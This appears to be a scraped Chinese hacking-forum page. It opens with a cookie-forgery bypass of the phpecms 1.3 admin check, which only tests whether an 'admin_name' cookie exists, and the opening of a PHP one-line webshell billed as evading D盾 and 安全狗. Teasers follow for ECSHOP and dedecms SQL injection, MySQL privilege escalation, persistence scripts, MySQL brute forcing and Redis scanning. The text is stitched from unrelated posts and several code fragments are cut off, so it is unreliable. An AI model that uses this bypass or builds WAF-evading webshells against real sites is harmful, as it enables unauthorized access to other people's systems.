phpecms1.3 cookies欺骗漏洞进后台

phpecms1.3/admin/cms_check.php

<span class="php"><span class="hljs-meta">&lt;?php</span>
	<span class="hljs-keyword">if</span>(!<span class="hljs-keyword">isset</span>($_COOKIE[<span class="hljs-string">'admin_name'</span>])){
		alert_href(<span class="hljs-string">'非法登录'</span>,<span class="hljs-string">'cms_login.php'</span>);
	};
<span class="hljs-meta">?&gt;</span></span>

判断如果没有admin_name的cookie就跳登录页面,如果admin_name就不跳了。

过D盾,安全狗,一句话

其他waf什么的自己测试

//过D盾过安全狗
 
<?php
error_reporting(0);
$b

ECSHOP /admin/affiliate_ck.php sql注入

ECSHOP /admin/affiliate_ck.php sql注入

Mysql代码执行漏洞,可本地提权(含exp)

Mysql代码执行漏洞,可本地提权(含exp)

虚拟主机提权的两个小技巧

是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"?


原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写,其他的任何可写的目录都不会让你执行,都会是拒绝访问。


下面是个人的小技巧:


0x01: 是否大

维持权限的小脚本

分享一个瞎写的维持权限的小脚本,感觉有用就拿去

秒杀星外提权

查找可写目录,递归无限子目录。


<img src="http://www.5kik.com/

python多线程实现批量MYSQL爆破

虽然网上现在有很多的这样的脚本,但是自己还是打算依次写一写吧,来提升自己的python的基础编程能力计划先是:FTP,SSH,mssql,.......等等各种端口的多线程的批量爆破,然后再去写渗透测试中的常用小工具,如:url深度爬虫,

批量扫描Redis未授权脚本(多线程)

批量扫描Redis未授权脚本(多线程)

dedecms有条件sql注入(x0day)

dedecms有条件sql注入